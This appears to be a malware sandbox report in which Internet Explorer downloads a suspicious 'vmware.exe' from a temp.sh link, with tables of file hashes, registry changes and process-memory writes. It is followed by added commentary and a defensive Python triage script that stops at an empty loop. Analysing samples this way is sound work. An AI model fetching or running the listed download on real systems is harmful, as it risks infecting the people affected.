C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\fir_tree\wallpaper.json

MD5 8a2f19a330d46083231ef031eb5a3749
SHA1 81114f2e7bf2e9b13e177f5159129c3303571938
SHA256 2cc83bc391587b7fe5ddd387506c3f51840b806f547d203ccd90487753b782f1
SHA512 635828e7b6044eeede08e3d2bb2e68bc0dbbe9e14691a9fb6e2bc9a2ac96526d8b39c8e22918ff2d944fb07b2531077f8febd43028be8213aa2fad858b6ee116

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\fir_tree\fir_tree_preview.png

MD5 d6305ea5eb41ef548aa560e7c2c5c854
SHA1 4d7d24befe83f892fb28a00cf2c4121aeb2d9c5d
SHA256 4c2b561cf301d9e98383d084a200deb7555ec47a92772a94453d3d8d1de04080
SHA512 9330009997d62c1804f1e4cf575345016cda8d6a1dd6cb7d2501df65ea2021df6b8a5bc26809ddfc84e6ff9450f1e404c135561b1b00b9e4915c69e84f89cfec

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\Extensions\ghjgbemlcjioaaejhnnmgfpiplgalgcl.json

MD5 2ec6275318f8bfcab1e2e36a03fd9ffa
SHA1 063008acf0df2415f5bd28392d05b265427aac5c
SHA256 20832de8163d5af0a0c8bda863bcd6083df4f92175d856ce527de1dae1f7c433
SHA512 5eee4555be05d07bce49c9d89a1a64bb526b83e3ca6f06e2f9ef2094ad04c892110d43c25183da336989a00d05dad6ff5898ff59e2f0a69dcaaf0aa28f89a508

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\easylist\manifest.json

MD5 15bcd6d3b8895b8e1934ef224c947df8
SHA1 e4a7499779a256475d8748f6a00fb4580ac5d80d
SHA256 77334f6256abddcc254f31854d1b00aa6743e20aadbb9e69187144847099a66b
SHA512 c2d3778a99af8d8598e653593d5e2d1d0b3b2ace11addd2d3eeb2bf3b57d51bf938ddaf2d2743322e0ce02e291b81f61c319daf34c1cd604ffce1f6407a30b34

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\easylist\easylist.txt

MD5 8e4bcad511334a0d363fc9f0ece75993
SHA1 62d4b56e340464e1dc4344ae6cb596d258b8b5de
SHA256 2f317fee439877eaadb1264bd3d1e153c963ef98596a4ccf227592aea12ae76f
SHA512 65077bd249c51be198234ff927040ef849cd79adcd611ed2afae511bc2a257a21f13171bf01cb06fce788c1cff88c8ad39cf768c5900d77cd15453a35e7f0721

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\extension\elokbjeafkcggjfjkakpchmcmhkhaofn\brand_settings.json

MD5 f70c4b106fa9bb31bc107314c40c8507
SHA1 2a39695d79294ce96ec33b36c03e843878397814
SHA256 4940847c9b4787e466266f1bb921097abb4269d6d10c0d2f7327fde9f1b032b7
SHA512 494dce5543e6dacc77d546015f4ea75fd2588625e13450dba7ba0bd4c2f548b28c746a0d42c7f9b20d37f92af6710927d4bccb2fee4faa17d3ec2c07ff547e70

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\extension\fcgfaidpicddcilhjhafmmcgfodijhjd\brand_settings.json

MD5 a3779768809574f70dc2cba07517da14
SHA1 ffd2343ed344718fa397bac5065f6133008159b8
SHA256 de0fbb08708d4be7b9af181ec26f45fccd424e437bc0cfb5cf38f2604f01f7b2
SHA512 62570be7ea7adee14b765d2af46fcd4dc8eec9d6274d9e00c5f361ff9b0cdb150305edad65a52b557c17dd9682e371004a471fa8958b0bd9cfbe42bb04ca5240

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

MD5 20d11a140d4a8cf002b2e215e0530981
SHA1 8b51ef221cdadac07f0d35b750b059d2df542f1e
SHA256 2f69a50fd3bc75d3cd7debc4096430d1d7cf39f04cc81952c0313ced6708f5db
SHA512 81bed05ad47ff203c551c849c9b29b469c9480376a79d7cd113c0a8593efe6db634286f2cad79671f88220a542be2fbcee2bd861baf3cdb932ff4f9e980ed333

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\extension\gopnelejddjjkamjfblkcijjikkinnec\brand_settings.json

MD5 30fdb583023f550b0f42fd4e547fea07
SHA1 fcd6a87cfb7f719a401398a975957039e3fbb877
SHA256 114fd03aa5ef1320f6cc586e920031cf5595a0d055218ce30571ff33417806d3
SHA512 bae328e1be15c368f75396d031364bef170cfcf95dbdf4d78be98cff2b37a174d3f7ebb85b6e9eb915bb6269898cbcecd8a8415dc005c4444175fe0447126395

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\flowers\wallpaper.json

MD5 a0ef93341ffbe93762fd707ef00c841c
SHA1 7b7452fd8f80ddd8fa40fc4dcb7b4c69e4de71a0
SHA256 70c8d348f7f3385ac638956a23ef467da2769cb48e28df105d10a0561a8acb9e
SHA512 a40b5f7bd4c2f5e97434d965ef79eed1f496274278f7caf72374989ac795c9b87ead49896a7c9cbcac2346d91a50a9e273669296da78ee1d96d119b87a7ae66a

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\flowers\flowers_preview.png

MD5 ba6e7c6e6cf1d89231ec7ace18e32661
SHA1 b8cba24211f2e3f280e841398ef4dcc48230af66
SHA256 70a7a65aa6e8279a1a45d93750088965b65ea8e900c5b155089ca119425df003
SHA512 1a532c232dd151474fbc25e1b435a5e0d9d3f61372036d97bcaab3c352e7037f1c424b54a8904ef52cf34c13a77b7ab295fb4fd006c3ab86289577f469a6cd4c

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\huangshan\huangshan_preview.jpg

MD5 1edab3f1f952372eb1e3b8b1ea5fd0cf
SHA1 aeb7edc3503585512c9843481362dca079ac7e4a
SHA256 649c55ccc096cc37dfe534f992b1c7bda68da589258611924d3f6172d0680212
SHA512 ecd9609fbf821239ddcbdc18ef69dade6e32efd10c383d79e0db39389fa890a5c2c6db430a01b49a44d5fa185f8197dbbde2e1e946f12a1f97a8c118634c0c34

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\huangshan\huangshan.webm

MD5 b78f2fd03c421aa82b630e86e4619321
SHA1 0d07bfbaa80b9555e6eaa9f301395c5db99dde25
SHA256 05e7170852a344e2f3288fc3b74c84012c3d51fb7ad7d25a15e71b2b574bfd56
SHA512 404fb2b76e5b549cbcba0a8cf744b750068cbd8d0f9f6959c4f883b35bcaa92d46b0df454719ca1cef22f5924d1243ba2a677b2f86a239d20bfad5365dc08650

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\meadow\preview.png

MD5 d10bda5b0d078308c50190f4f7a7f457
SHA1 3f51aae42778b8280cd9d5aa12275b9386003665
SHA256 0499c4cc77a64cc89055b3c65d7af8387f5d42399ff2c0a2622eccbd6d481238
SHA512 668e1a70a50a0decf633167ac23cba6916d0e05d0894daae1f7e3d487519f0a126abd4298430b38f52746a5c3b83ccd520b3d9b0ae1a79f893e36821a0458566

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\misty_forest\wallpaper.json

MD5 2b65eb8cc132df37c4e673ff119fb520
SHA1 a59f9abf3db2880593962a3064e61660944fa2de
SHA256 ebe9cadad41bd573f4b5d20e3e251410300b1695dfdf8b1f1f1276d0f0f8fa6d
SHA512 c85fe6895453d0c38a1b393307b52d828bad8fa60d1d65bb83ffa3c5e17b71aa13cab60955489198503839ce5a4a6c1bb353752ab107f5e5b97908116c987e52

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\misty_forest\preview.png

MD5 77aa87c90d28fbbd0a5cd358bd673204
SHA1 5813d5759e4010cc21464fcba232d1ba0285da12
SHA256 ea340a389af6d7ad760dff2016cf4e79488bda1a45d0a415b3cd02a4430c9711
SHA512 759519b8822a6a4b88fc9ba47fa9d5d898b2f5a0f359acfbefc04809e6d7f5df86fb130f191eb6f63322792a18c0e7170aedf3ce7060fd9ad7e1bec2e686c3b2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\peak\wallpaper.json

MD5 f0ac84f70f003c4e4aff7cccb902e7c6
SHA1 2d3267ff12a1a823664203ed766d0a833f25ad93
SHA256 e491962b42c3f97649afec56ad4ea78fd49845ceb15f36edddd08d9e43698658
SHA512 75e048c1d1db6618ead9b1285846922c16a46ee138a511e21235342a5a6452c467b906578bdd4a56e7b9e0a26535df6fb6319ae1cae238055887b48963fa6ed6

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\peak\preview.png

MD5 1d62921f4efbcaecd5de492534863828
SHA1 06e10e044e0d46cd6dccbcd4bae6fb9a77f8be45
SHA256 f72ea12f6c972edfe3d5a203e1e42cbbaf4985633de419342c2af31363f33dab
SHA512 eec8171bd3bea92e24066e36801f334ac93905b7e8e50935f360e09fa8c9b9f848c4c62b687299e8297c0693d6dbaf9c6035b471e6345d626510b73e3606ee4d

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\raindrops\wallpaper.json

MD5 5f18d6878646091047fec1e62c4708b7
SHA1 3f906f68b22a291a3b9f7528517d664a65c85cda
SHA256 bcfea0bebf30ee9744821a61fcce6df0222c1a266e0995b9a8cfbb9156eeeefd
SHA512 893b2077a4abaa2fe89676c89f5e428ccd2420177268159395b5568824dd3fe08bea8a8b2f828c6c9297b19e0f8e3a1b7899315c0b07f4b61fc86ce94301518b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\raindrops\raindrops_preview.png

MD5 28b10d683479dcbf08f30b63e2269510
SHA1 61f35e43425b7411d3fbb93938407365efbd1790
SHA256 1e70fc9965939f6011488f81cd325223f17b07ee158a93c32c124602b506aa6b
SHA512 05e5b5e9c5ef61f33a883b0286c2239cb2a464581d6e8a86d7b179b1887b4cb2cd7304e0821cdd3208501421c44c63c248a5166c790792717a90f8ac528fbf2f

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\sea\wallpaper.json

MD5 92e86315b9949404698d81b2c21c0c96
SHA1 4e3fb8ecf2a5c15141bb324ada92c5c004fb5c93
SHA256 c2bb1e5d842c7e5b1b318f6eb7fe1ce24a8209661ddd5a83ab051217ca7c3f65
SHA512 2834b1ef7bb70b2d24c4fedef87cd32c6e8f401d8ee5f3852808f6a557724ce036c31a71298cd0ed601cde4be59ec4042542351c63c4e0ac3d31419f79240956

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\sea\sea_preview.png

MD5 3c0d06da1b5db81ea2f1871e33730204
SHA1 33a17623183376735d04337857fae74bcb772167
SHA256 02d8e450f03129936a08b67f3a50ea5d2e79f32c4e8f24d34b464f2cb5e0b086
SHA512 ff0e60c94fc3c0c61d356a26667c5170256e1143b29adf23d4e7d27012da72ed8865ef59dc2046314c7335b8d3d331e5fd78f38b9b92f6af48729dae80f85b15

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\stars\wallpaper.json

MD5 9660de31cea1128f4e85a0131b7a2729
SHA1 a09727acb85585a1573db16fa8e056e97264362f
SHA256 d1bef520c71c7222956d25335e3ba2ea367d19e6c821fb96c8112e5871576294
SHA512 4cb80766c8e3c77dfb5ca7af515939e745280aa695eca36e1f0a83fb795b2b3ef406472f990a82c727cea42d1b4ef44a0d34a7f4f23e362f2992dbff2527798b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\stars\preview.png

MD5 ed9839039b42c2bf8ac33c09f941d698
SHA1 822e8df6bfee8df670b9094f47603cf878b4b3ed
SHA256 4fa185f67eaf3a65b991cea723d11f78de15a6a9a5235848a6456b98a9d7f689
SHA512 85119055ddfc6bc4cca05de034b941b1743cbb787607c053e8c10309572d2ef223786fc454d962fbb5e3cde5320117f9efe99041116db48916bc3d2fcd4ffa25

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\web\web_preview.png

MD5 3f7b54e2363f49defe33016bbd863cc7
SHA1 5d62fbfa06a49647a758511dfcca68d74606232c
SHA256 0bbf72a3c021393192134893777ecb305717ccef81b232961ca97ae4991d9ba8
SHA512 b3b458860701f3bc163b4d437066a58b5d441d8a427a8b03772c9c519c01983e3d3fdb8da20f6a53ad95c88dcdd0298f72822f39bc3672cb6f1d77fcc3f025a9

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\web\wallpaper.json

MD5 e4bd3916c45272db9b4a67a61c10b7c0
SHA1 8bafa0f39ace9da47c59b705de0edb5bca56730c
SHA256 7fdddc908bd2f95411dcc4781b615d5da3b5ab68e8e5a0e2b3d2d25d713f0e01
SHA512 4045e262a0808225c37711b361837070d0aeb5d65a32b5d514cc6f3c86962ba68f7d108bf4d81aa3bf645789d0753029a72c1ce34688a6d7af15f3e854c73f07

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\sea_static.jpg

MD5 5e1d673daa7286af82eb4946047fe465
SHA1 02370e69f2a43562f367aa543e23c2750df3f001
SHA256 1605169330d8052d726500a2605da63b30613ac743a7fbfb04e503a4056c4e8a
SHA512 03f4abc1eb45a66ff3dcbb5618307867a85f7c5d941444c2c1e83163752d4863c5fc06a92831b88c66435e689cdfccdc226472be3fdef6d9cb921871156a0828

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\sea_preview.jpg

MD5 53ba159f3391558f90f88816c34eacc3
SHA1 0669f66168a43f35c2c6a686ce1415508318574d
SHA256 f60c331f1336b891a44aeff7cc3429c5c6014007028ad81cca53441c5c6b293e
SHA512 94c82f78df95061bcfa5a3c7b6b7bf0b9fb90e33ea3e034f4620836309fb915186da929b0c38aa3d835e60ea632fafd683623f44c41e72a879baf19de9561179

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\1-1x.png

MD5 80121a47bf1bb2f76c9011e28c4f8952
SHA1 a5a814bafe586bc32b7d5d4634cd2e581351f15c
SHA256 a62f9fdf3de1172988e01a989bf7a2344550f2f05a3ac0e6dc0ccd39ed1a697e
SHA512 a04df34e61fd30764cf344b339ba2636b9280a358863f298690f6a8533c5e5dfa9773a14f8d16a5bb709ea17cf75e1da6302335aa9120009892e529bfad30df9

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\tablo

MD5 58697e15ca12a7906e62fc750e4d6484
SHA1 c5213072c79a2d3ffe5e24793c725268232f83ab
SHA256 1313aa26cc9f7bd0f2759cfaff9052159975551618cba0a90f29f15c5387cad4
SHA512 196b20d37509ea535889ec13c486f7ee131d6559fb91b95de7fdd739d380c130298d059148c49bf5808d8528d56234c589c9d420d63264f487f283f67a70c9a6

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\sxs.ico

MD5 592b848cb2b777f2acd889d5e1aae9a1
SHA1 2753e9021579d24b4228f0697ae4cc326aeb1812
SHA256 ad566a3e6f8524c705844e95a402cdeb4d6eed36c241c183147409a44e97ebcd
SHA512 c9552f4db4b6c02707d72b6f67c2a11f1cf110b2c4ac5a1b7ac78291a14bf6eb35a9b4a05bc51ac80135504cd9dcad2d7a883249ee2e20a256cb9e9ceeb0032f

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\import-bg.png

MD5 85756c1b6811c5c527b16c9868d3b777
SHA1 b473844783d4b5a694b71f44ffb6f66a43f49a45
SHA256 7573af31ed2bfcfff97ed2132237db65f05aff36637cd4bdeccdf8ca02cd9038
SHA512 1709222e696c392ca7bcd360f9a2b301896898eb83ddfb6a9db0d0c226a03f50671633b8bed4d060d8f70df7282ffc2cd7ab1d1449acf2e07a7b6c251aa3a19e

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\about_logo_ru_2x.png

MD5 a6911c85bb22e4e33a66532b0ed1a26c
SHA1 cbd2b98c55315ac6e44fb0352580174ed418db0a
SHA256 5bb0977553ded973c818d43a178e5d9874b24539dacbd7904cd1871e0ba82b23
SHA512 279fb0c1f2871ce41b250e9a4662046bc13c6678a79866eaf317cc93c997a683114122092214ce24f8e7f8a40520fe4ca03f54930148f4f794df0df3ecf74e9d

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\about_logo_ru.png

MD5 ff321ebfe13e569bc61aee173257b3d7
SHA1 93c5951e26d4c0060f618cf57f19d6af67901151
SHA256 1039ea2d254d536410588d30f302e6ab727d633cf08cb409caa5d22718af5e64
SHA512 e98fbfb4ed40c5ac804b9f4d9f0c163508c319ec91f5d1e9deb6a5d3eada9338980f1b5fe11c49e6e88935ecd50119d321ce55ca5bdd0723a6e8c414e1e68e16

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\about_logo_en_2x.png

MD5 900fdf32c590f77d11ad28bf322e3e60
SHA1 310932b2b11f94e0249772d14d74871a1924b19f
SHA256 fe20d86fd62a4d1ab51531b78231749bd5990c9221eab1e7958be6d6aef292d9

Analysis: behavioral3

Detonation Overview

Submitted: 2024-06-23 21:54
Reported: 2024-06-23 21:55
Platform: win11-20240508-en
Max time kernel: 49s
Max time network: 49s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

Signatures

Enumerates system info in registry

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |

Modifies Internet Explorer settings

adware spyware
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31114712" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1679093098" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |

Suspicious use of FindShellTrayWindow

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1416 wrote to memory of 4092 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2324 (40 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 1492 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1416 wrote to memory of 2220 (20 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

All 64 writes originate from PID 1416, which is the msedge.exe browser (broker) process: the crash-handler pipe listed under Files below is \??\pipe\LOCAL\crashpad_1416_NIBMKNXIMCGIGTNN, and Chromium's Crashpad client names that pipe after the PID of the process that started the handler. Every target is another msedge.exe instance, which is consistent with the broker setting up its own sandboxed child processes. On its own this signature is browser noise; it would need the sample as the writer, or a non-browser process as the target, to indicate injection.
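The aggregated rows above are what a triage pass should produce from the raw event list. The Python below is an added example, not part of the sandbox's report or its tooling: it parses rows in this table's layout, collapses repeats into one entry per source/target pair, and marks same-image browser broker-to-child writes as expected while flagging everything else. The sample input reproduces the four pairs and counts from the table and adds one constructed cross-image row (PIDs 5212 and 3388, sample.exe and svchost.exe, all hypothetical) so the flagging path is exercised; the MULTIPROCESS_BROWSERS set is an assumption of the example.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# Row layout of the sandbox's "Suspicious use of WriteProcessMemory" table:
#   PID <src> wrote to memory of <dst> <indicator> <process image> <target image>
# Image paths contain spaces, so anchor on the drive letter and the .exe suffix.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P<ind>\S+) "
    r"(?P<src_img>[A-Za-z]:\\.*?\.exe) (?P<dst_img>[A-Za-z]:\\.*?\.exe)$"
)

# Assumption: these multi-process browsers launch sandboxed children from a broker
# of the same image, which the sandbox logs as broker->child WriteProcessMemory.
MULTIPROCESS_BROWSERS = {"msedge.exe", "chrome.exe"}

EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
# Constructed sample: the report's four (source, target) pairs with their counts,
# plus one hypothetical cross-image row (PIDs, sample.exe, svchost.exe all invented).
SAMPLE_ROWS = (
    [f"PID 1416 wrote to memory of 4092 N/A {EDGE} {EDGE}"] * 2
    + [f"PID 1416 wrote to memory of 2324 N/A {EDGE} {EDGE}"] * 40
    + [f"PID 1416 wrote to memory of 1492 N/A {EDGE} {EDGE}"] * 2
    + [f"PID 1416 wrote to memory of 2220 N/A {EDGE} {EDGE}"] * 20
    + [r"PID 5212 wrote to memory of 3388 N/A C:\Users\Admin\Downloads\sample.exe "
       r"C:\Windows\System32\svchost.exe"]
)


def parse_row(line):
    """Return the row's fields as a dict, or None for lines that are not events."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    row["src"], row["dst"] = int(row["src"]), int(row["dst"])
    return row


def verdict(src_img, dst_img):
    """'expected' for a browser broker writing into a child of the same image, else 'investigate'."""
    src = PureWindowsPath(src_img).name.lower()
    dst = PureWindowsPath(dst_img).name.lower()
    if src == dst and src in MULTIPROCESS_BROWSERS:
        return "expected"
    return "investigate"


def summarize(lines):
    """Collapse repeated event rows into one entry per (src, dst, images) with a count and verdict."""
    counts = Counter()
    for line in lines:
        row = parse_row(line)
        if row:
            counts[(row["src"], row["dst"], row["src_img"], row["dst_img"])] += 1
    return [
        {"src": src, "dst": dst, "src_img": src_img, "dst_img": dst_img,
         "count": n, "verdict": verdict(src_img, dst_img)}
        for (src, dst, src_img, dst_img), n in sorted(counts.items())
    ]


if __name__ == "__main__":
    for r in summarize(SAMPLE_ROWS):
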